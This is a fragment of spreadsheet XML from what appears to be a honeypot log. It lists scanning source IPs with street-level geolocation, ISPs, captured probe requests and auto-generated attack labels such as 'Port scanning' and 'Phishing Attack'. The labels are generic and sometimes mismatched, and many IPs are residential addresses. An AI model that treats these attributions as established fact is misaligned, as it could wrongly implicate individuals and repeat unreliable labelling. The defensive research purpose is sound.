    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;10295&amp;&amp;3306&amp;&amp;1433&amp;&amp;161</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>2005-05-05</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:dce7:6b9c</t>
  </si>
  <si>
    <t>815c41dff7e17585faef9d40018b83be</t>
  </si>
  <si>
    <t>223.16.53.177</t>
  </si>
  <si>
    <t>::ffff:df10:35b1</t>
  </si>
  <si>
    <t>464834910c5a14fa3e222a84bc2aa6d3</t>
  </si>
  <si>
    <t>209.38.31.50</t>
  </si>
  <si>
    <t>8443&amp;&amp;NA</t>
  </si>
  <si>
    <t>Alexandria</t>
  </si>
  <si>
    <t>2178136</t>
  </si>
  <si>
    <t>2015</t>
  </si>
  <si>
    <t>-33.9088</t>
  </si>
  <si>
    <t>151.196</t>
  </si>
  <si>
    <t>14061</t>
  </si>
  <si>
    <t>DigitalOcean, LLC</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2g'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2h'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d126:1f32</t>
  </si>
  <si>
    <t>5aebea8f381a75686a991fbc7ff16738</t>
  </si>
  <si>
    <t>70.76.225.233</t>
  </si>
  <si>
    <t>S0106d4e2cb5444ec.su.shawcable.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Algoma</t>
  </si>
  <si>
    <t>Sault Ste. Marie</t>
  </si>
  <si>
    <t>6141439</t>
  </si>
  <si>
    <t>P6A</t>
  </si>
  <si>
    <t>46.5136</t>
  </si>
  <si>
    <t>-84.3358</t>
  </si>
  <si>
    <t>6327</t>
  </si>
  <si>
    <t>Shaw Communications Inc.</t>
  </si>
  <si>
    <t>Shaw Communications Inc</t>
  </si>
  <si>
    <t>::ffff:464c:e1e9</t>
  </si>
  <si>
    <t>da9c0a2608a24b52c5065eafbdee3877</t>
  </si>
  <si>
    <t>59.127.97.230</t>
  </si>
  <si>
    <t>::ffff:3b7f:61e6</t>
  </si>
  <si>
    <t>4753aa5111523c251ae8467857901f1f</t>
  </si>
  <si>
    <t>46.106.192.107</t>
  </si>
  <si>
    <t>Sarıyer</t>
  </si>
  <si>
    <t>739549</t>
  </si>
  <si>
    <t>34381</t>
  </si>
  <si>
    <t>41.1131</t>
  </si>
  <si>
    <t>29.0245</t>
  </si>
  <si>
    <t>44558</t>
  </si>
  <si>
    <t>Netonline Bilisim Sirketi LTD</t>
  </si>
  <si>
    <t>Vodafone-Turkey</t>
  </si>
  <si>
    <t>Vodafone Telekomunikasyon A.S.</t>
  </si>
  <si>
    <t>::ffff:2e6a:c06b</t>
  </si>
  <si>
    <t>The attacker is attempting to gather sensitive information from various systems, including database credentials and system configurations. They are also trying to establish unauthorized connections to services such as FTP, HTTP, and HTTPS.</t>
  </si>
  <si>
    <t>Phishing Attack</t>
  </si>
  <si>
    <t>a3700fdf260e6a3265df133141d0422d</t>
  </si>
  <si>
    <t>83.85.234.111</t>
  </si>
  <si>
    <t>83-85-234-111.cable.dynamic.v4.ziggo.nl&amp;&amp;NA</t>
  </si>
  <si>
    <t>ZH</t>
  </si>
  <si>
    <t>South Holland</t>
  </si>
  <si>
    <t>Gemeente Den Haag</t>
  </si>
  <si>
    <t>The Hague</t>
  </si>
  <si>
    <t>2747373</t>
  </si>
  <si>
    <t>2597</t>
  </si>
  <si>
    <t>52.0705</t>
  </si>
  <si>
    <t>4.3007</t>
  </si>
  <si>
    <t>33915</t>
  </si>
  <si>
    <t>Vodafone Libertel B.V.</t>
  </si>
  <si>
    <t>Vodafone Ziggo</t>
  </si>
  <si>
    <t>::ffff:5355:ea6f</t>
  </si>
  <si>
    <t>554fef90a71702ca6e105c364c9a57e1</t>
  </si>
  <si>
    <t>113.61.241.36</t>
  </si>
  <si>
    <t>113-61-241-36.veetime.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3412&amp;&amp;23&amp;&amp;51250&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>24.163</t>
  </si>
  <si>
    <t>120.675</t>
  </si>
  <si>
    <t>VEE TIME CORP.</t>
  </si>
  <si>
    <t>EMAX</t>
  </si>
  <si>
    <t>e-MAX NETWORK CORP.</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:713d:f124</t>
  </si>
  <si>
    <t>a10597a91e8051c0971b2a00b511bc78</t>
  </si>
  <si>
    <t>123.240.127.181</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_HTTP_H43&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;22&amp;&amp;80&amp;&amp;60513&amp;&amp;23&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>TBCOM-NET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7bf0:7fb5</t>
  </si>
  <si>
    <t>e71b4fc0db62743946441857f86b6cba</t>
  </si>
  <si>
    <t>161.51.208.163</t>
  </si>
  <si>
    <t>WC2N</t>
  </si>
  <si>
    <t>51.5077</t>
  </si>
  <si>
    <t>-0.122556</t>
  </si>
  <si>
    <t>201838</t>
  </si>
  <si>
    <t>Community Fibre Limited</t>
  </si>
  <si>
    <t>::ffff:a133:d0a3</t>
  </si>
  <si>
    <t>d6fe646eb65f229f204f53f7259e7870</t>
  </si>
  <si>
    <t>110.24.36.60</t>
  </si>
  <si>
    <t>NA&amp;&amp;110-24-36-60.adsl.fetnet.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>47690&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:6e18:243c</t>
  </si>
  <si>
    <t>d26f00f9f104322695a005654171a198</t>
  </si>
  <si>
    <t>117.200.177.174</t>
  </si>
  <si>
    <t>::ffff:75c8:b1ae</t>
  </si>
  <si>
    <t>410c9b724bf4dce36befdec2b82dd359</t>
  </si>
  <si>
    <t>87.182.154.94</t>
  </si>
  <si>
    <t>p57b69a5e.dip0.t-ipconnect.de&amp;&amp;NA</t>
  </si>
  <si>
    <t>Regierungsbezirk Münster</t>
  </si>
  <si>
    <t>Schöppingen</t>
  </si>
  <si>
    <t>2836390</t>
  </si>
  <si>
    <t>52.1</t>
  </si>
  <si>
    <t>7.23333</t>
  </si>
  <si>
    <t>3320</t>
  </si>
  <si>
    <t>Deutsche Telekom AG</t>
  </si>
  <si>
    <t>::ffff:57b6:9a5e</t>
  </si>
  <si>
    <t>742960cdde06a701ad3924166874f4ea</t>
  </si>
  <si>
    <t>185.140.59.18</t>
  </si>
  <si>
    <t>60627</t>
  </si>
  <si>
    <t>Rayankadeh Apadana Company Ltd</t>
  </si>
  <si>
    <t>Satia Yaghout2</t>
  </si>
  <si>
    <t>::ffff:b98c:3b12</t>
  </si>
  <si>
    <t>93df08b07d9dad554dfdc9eb1ff1a4e3</t>
  </si>
  <si>
    <t>27.100.192.6</t>
  </si>
  <si>
    <t>Jeju-do</t>
  </si>
  <si>
    <t>Jeju-si</t>
  </si>
  <si>
    <t>Jeju-si (Ayeon-ro)</t>
  </si>
  <si>
    <t>1846261</t>
  </si>
  <si>
    <t>63142</t>
  </si>
  <si>
    <t>33.4748</t>
  </si>
  <si>
    <t>126.512</t>
  </si>
  <si>
    <t>9946</t>
  </si>
  <si>
    <t>KCTV JEJU BROADCASTING</t>
  </si>
  <si>
    <t>Kctv Jeju Broadcasting</t>
  </si>
  <si>
    <t>Cablenet</t>
  </si>
  <si>
    <t>2010-05-31</t>
  </si>
  <si>
    <t>CABLENET</t>
  </si>
  <si>
    <t>::ffff:1b64:c006</t>
  </si>
  <si>
    <t>The attacker is conducting a reconnaissance and testing the services, likely to identify vulnerabilities or find open ports. They are trying various combinations of commands and credentials to gain unauthorized access.</t>
  </si>
  <si>
    <t>c1c2e2a23d9f17c2896d68e476297119</t>
  </si>
  <si>
    <t>152.89.162.226</t>
  </si>
  <si>
    <t>SMA-LAB_REDIS_HC1</t>
  </si>
  <si>
    <t>6379</t>
  </si>
  <si>
    <t>CH</t>
  </si>
  <si>
    <t>Switzerland</t>
  </si>
  <si>
    <t>Zurich</t>
  </si>
  <si>
    <t>Bezirk Dietikon</t>
  </si>
  <si>
    <t>Schlieren</t>
  </si>
  <si>
    <t>2658724</t>
  </si>
  <si>
    <t>8952</t>
  </si>
  <si>
    <t>47.3967</t>
  </si>
  <si>
    <t>8.44763</t>
  </si>
  <si>
    <t>M247 Europe</t>
  </si>
  <si>
    <t>M247 LTD</t>
  </si>
  <si>
    <t>2019-01-25</t>
  </si>
  <si>
    <t>{Data_REDIS:NA}</t>
  </si>
  <si>
    <t>::ffff:9859:a2e2</t>
  </si>
  <si>
    <t>The attacker is attempting to gather information and potentially gain unauthorized access to various systems and services, using reconnaissance techniques such as DNS enumeration, FTP login attempts, HTTP requests for sensitive data, IMAP login attempts, and others. &amp;&amp; The threat actor is attempting to scan and exploit various services on the network, likely for unauthorized access or data extraction purposes. They are using multiple protocols, such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP, and PostgreSQL, to gather information about the network and identify potential vulnerabilities.</t>
  </si>
  <si>
    <t>Scanning for vulnerabilities. &amp;&amp; **Unauthorized Network Scanning**</t>
  </si>
  <si>
    <t>23a658981927e6f6fa9391f151265cdc</t>
  </si>
  <si>
    <t>113.173.134.5</t>
  </si>
  <si>
    <t>::ffff:71ad:8605</t>
  </si>
  <si>
    <t>The attackers are performing reconnaissance and scanning activities across multiple services, likely trying to identify vulnerabilities and potential entry points for further exploitation. They are sending probes and test messages to various systems, gathering information about the network configuration and possible targets. &amp;&amp; It appears that an attacker is attempting to gather information about the targeted systems, likely for future exploitation. They are sending various requests to different services, including port scanning and banner grabbing. This activity suggests a reconnaissance phase, where the attacker is trying to map out the network and identify potential vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">Port Scan/Reconnaissance &amp;&amp;  </t>
  </si>
  <si>
    <t>03a12f66bd8af1f7eb5bae4aefe62c2c</t>
  </si>
  <si>
    <t>168.149.12.78</t>
  </si>
  <si>
    <t>SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>24.7136</t>
  </si>
  <si>
    <t>46.6753</t>
  </si>
  <si>
    <t>25019</t>
  </si>
  <si>
    <t>{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}</t>
  </si>
  <si>
    <t>::ffff:a895:c4e</t>
  </si>
  <si>
    <t>The threat actor is attempting to scan and identify services on the network, as evidenced by the repeated attempts to connect to various ports and protocols (DHCP, DNS, FTP, HTTP, etc.). They are also trying to brute-force passwords for certain services (FTP, POP3). Furthermore, they seem to be probing for vulnerabilities in specific systems (e.g., SMB).</t>
  </si>
  <si>
    <t>Vulnerability scanning</t>
  </si>
  <si>
    <t>f534594fadf010c52456bf2f4a16fb2d</t>
  </si>
  <si>
    <t>93.182.78.138</t>
  </si>
  <si>
    <t>33</t>
  </si>
  <si>
    <t>Mersin</t>
  </si>
  <si>
    <t>Silifke</t>
  </si>
  <si>
    <t>Narlıkuyu</t>
  </si>
  <si>
    <t>10632123</t>
  </si>
  <si>
    <t>33940</t>
  </si>
  <si>
    <t>36.4685</t>
  </si>
  <si>
    <t>34.0975</t>
  </si>
  <si>
    <t>::ffff:5db6:4e8a</t>
  </si>
  <si>
    <t>f6c55796f8104c91ee370299c0673eb9</t>
  </si>
  <si>
    <t>110.78.133.51</t>
  </si>
  <si>
    <t>Bang Rak</t>
  </si>
  <si>
    <t>1619278</t>
  </si>
  <si>
    <t>10500</t>
  </si>
  <si>
    <t>13.7262</t>
  </si>
  <si>
    <t>100.528</t>
  </si>
  <si>
    <t>CAT-IDC-4bytenet-AS-AP</t>
  </si>
  <si>
    <t>Cat-Bb</t>
  </si>
  <si>
    <t>::ffff:6e4e:8533</t>
  </si>
  <si>
    <t>The attacker is attempting to gather information about the services and systems connected to the honeypot, likely in preparation for a larger-scale attack. They are scanning for open ports and testing various protocols such as FTP, HTTP, HTTPS, IMAP, and others to see which ones are accessible. &amp;&amp; The attacker is attempting to scan and exploit various services on the target network, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is using various protocols to gather information about the network, attempt authentication, and potentially gain access to sensitive data.</t>
  </si>
  <si>
    <t xml:space="preserve">Scanning Port &amp;&amp;  </t>
  </si>
  <si>
    <t>d0c63b96f4c8fb1316927f6915da7b52</t>
  </si>
  <si>
    <t>84.238.115.153</t>
  </si>
  <si>
    <t>84</t>
  </si>
  <si>
    <t>Capital Region</t>
  </si>
  <si>
    <t>Herlev Kommune</t>
  </si>
  <si>
    <t>Herlev</t>
  </si>
  <si>
    <t>2620431</t>
  </si>
  <si>
    <t>2730</t>
  </si>
  <si>
    <t>55.7237</t>
  </si>
  <si>
    <t>12.44</t>
  </si>
  <si>
    <t>33796</t>
  </si>
  <si>
    <t>Bolignet-Aarhus</t>
  </si>
  <si>
    <t>Bnaa Dhcp</t>
  </si>
  <si>
    <t>::ffff:54ee:7399</t>
  </si>
  <si>
    <t>50b0ee76431c3c797c20b63b3b19d99e</t>
  </si>
  <si>
    <t>190.55.5.53</t>
  </si>
  <si>
    <t>Comuna 15</t>
  </si>
  <si>
    <t>Buenos Aires (Villa Crespo)</t>
  </si>
  <si>
    <t>-34.6041</t>
  </si>
  <si>
    <t>-58.4448</t>
  </si>
  <si>
    <t>27747</t>
  </si>
  <si>
    <t>Telecentro S.A.</t>
  </si>
  <si>
    <t>Telecentro S.A. - Clientes Residenciales</t>
  </si>
  <si>
    <t>::ffff:be37:535</t>
  </si>
  <si>
    <t>The attacker is attempting to scan for and exploit various network services, gather information about the system, and potentially gain unauthorized access. The activity suggests a reconnaissance phase, with the attacker probing different ports and protocols in search of vulnerabilities.</t>
  </si>
  <si>
    <t>Port scanning is being performed using various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. The attacker is also attempting to authenticate with various usernames and passwords.</t>
  </si>
  <si>
    <t>93da4c5aac450398ab2dc4f97c940465</t>
  </si>
  <si>
    <t>75.88.85.93</t>
  </si>
  <si>
    <t>KY</t>
  </si>
  <si>
    <t>Kentucky</t>
  </si>
  <si>
    <t>Jefferson</t>
  </si>
  <si>
    <t>Louisville</t>
  </si>
  <si>
    <t>4299276</t>
  </si>
  <si>
    <t>40259</t>
  </si>
  <si>
    <t>38.2527</t>
  </si>
  <si>
    <t>-85.7585</t>
  </si>
  <si>
    <t>WINDSTREAM</t>
  </si>
  <si>
    <t>2024-09-18</t>
  </si>
  <si>
    <t>::ffff:4b58:555d</t>
  </si>
  <si>
    <t>6d9fc63b6b64663d861ee1b5e8039696</t>
  </si>
  <si>
    <t>131.196.146.48</t>
  </si>
  <si>
    <t>Itajubá</t>
  </si>
  <si>
    <t>3460834</t>
  </si>
  <si>
    <t>-22.4256</t>
  </si>
  <si>
    <t>-45.4528</t>
  </si>
  <si>
    <t>265911</t>
  </si>
  <si>
    <t>G6 Internet</t>
  </si>
  <si>
    <t>::ffff:83c4:9230</t>
  </si>
  <si>
    <t>bf339b4423b6d5f8fade9b69de96847b</t>
  </si>
  <si>
    <t>203.115.96.196</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H3&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;31835&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>28.6385</t>
  </si>
  <si>
    <t>77.0997</t>
  </si>
  <si>
    <t>17426</t>
  </si>
  <si>
    <t>Primesoftex Ltd</t>
  </si>
  <si>
    <t>PRIMENET</t>
  </si>
  <si>
    <t>Primenet Global Ltd.</t>
  </si>
  <si>
    <t>2000-06-30</t>
  </si>
  <si>
    <t>PRIMENET-IN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,58319)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,58368)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,60745)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,50809)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,50834)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.196,53218)}</t>
  </si>
  <si>
    <t>::ffff:cb73:60c4</t>
  </si>
  <si>
    <t>ea6543ea561c87a214c8a3e48fd5be1a</t>
  </si>
  <si>
    <t>45.120.18.176</t>
  </si>
  <si>
    <t>Murshidabad</t>
  </si>
  <si>
    <t>Baharampur (Khagra)</t>
  </si>
  <si>
    <t>1277820</t>
  </si>
  <si>
    <t>742103</t>
  </si>
  <si>
    <t>24.1023</t>
  </si>
  <si>
    <t>88.2561</t>
  </si>
  <si>
    <t>132568</t>
  </si>
  <si>
    <t>INFINET-AS</t>
  </si>
  <si>
    <t>Infinet Communictions</t>
  </si>
  <si>
    <t>::ffff:2d78:12b0</t>
  </si>
  <si>
    <t>The attacker is attempting to scan the network for open ports and services, potentially identifying vulnerabilities for future exploitation. They are also trying to gather information about the target systems, such as their operating systems, versions, and configurations. &amp;&amp; The attackers are attempting to scan and exploit various network services, including DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and TELNET. They are also attempting to gain access to sensitive data and systems through phishing attempts, brute-force attacks, and exploitation of vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve"> Port scanning  &amp;&amp;  Credential stuffing attack</t>
  </si>
  <si>
    <t>81e98afe703bbcf46f905bf6dcf5cabc</t>
  </si>
  <si>
    <t>220.135.8.241</t>
  </si>
  <si>
    <t>220-135-8-241.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>50484&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:dc87:8f1</t>
  </si>
  <si>
    <t>4e1c0ad8af06148103469f2addb52fab</t>
  </si>
  <si>
    <t>82.1.211.23</t>
  </si>
  <si>
    <t>cpc92302-cmbg19-2-0-cust790.5-4.cable.virginm.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Cambridgeshire</t>
  </si>
  <si>
    <t>Hauxton</t>
  </si>
  <si>
    <t>2647318</t>
  </si>
  <si>
    <t>52.1489</t>
  </si>
  <si>
    <t>0.1018</t>
  </si>
  <si>
    <t>5089</t>
  </si>
  <si>
    <t>Virgin Media Limited</t>
  </si>
  <si>
    <t>Virgin Media</t>
  </si>
  <si>
    <t>2003-02-28</t>
  </si>
  <si>
    <t>2007-03-07 12:22:23</t>
  </si>
  <si>
    <t>2026-03-07 12:22:23</t>
  </si>
  <si>
    <t>2025-02-06 07:29:04</t>
  </si>
  <si>
    <t>['NS1.VIRGINMEDIA.NET', 'NS2.VIRGINMEDIA.NET', 'NS3.VIRGINMEDIA.NET', 'NS4.VIRGINMEDIA.NET']</t>
  </si>
  <si>
    <t>['domainabuse@tucows.com', 'ABUSE@ENOM.COM']</t>
  </si>
  <si>
    <t>::ffff:5201:d317</t>
  </si>
  <si>
    <t>c2b98ddb4550bed98f67bdedd5862100</t>
  </si>
  <si>
    <t>24.26.37.151</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-024-026-037-151.res.spectrum.com</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Laurel</t>
  </si>
  <si>
    <t>Marydell</t>
  </si>
  <si>
    <t>4299997</t>
  </si>
  <si>
    <t>37.1325</t>
  </si>
  <si>
    <t>-84.1646</t>
  </si>
  <si>
    <t>::ffff:181a:2597</t>
  </si>
  <si>
    <t>b1e7891e22dd94b43e5a75483a8ed67b</t>
  </si>
  <si>
    <t>114.24.35.98</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-24-35-98.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:7218:2362</t>
  </si>
  <si>
    <t>ac57fbae65ad12ef2af62532e35462c2</t>
  </si>
  <si>
    <t>198.44.174.84</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SMB_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;40870&amp;&amp;1433&amp;&amp;445&amp;&amp;51922&amp;&amp;NA</t>
  </si>
  <si>
    <t>NSK</t>
  </si>
  <si>
    <t>Sai Kung</t>
  </si>
  <si>
    <t>Tseung Kwan O</t>
  </si>
  <si>
    <t>1818506</t>
  </si>
  <si>
    <t>22.3119</t>
  </si>
  <si>
    <t>114.257</t>
  </si>
  <si>
    <t>134365</t>
  </si>
  <si>
    <t>Ansheng Network Technology Co., Limited</t>
  </si>
  <si>
    <t>VpsQuan L.L.C</t>
  </si>
  <si>
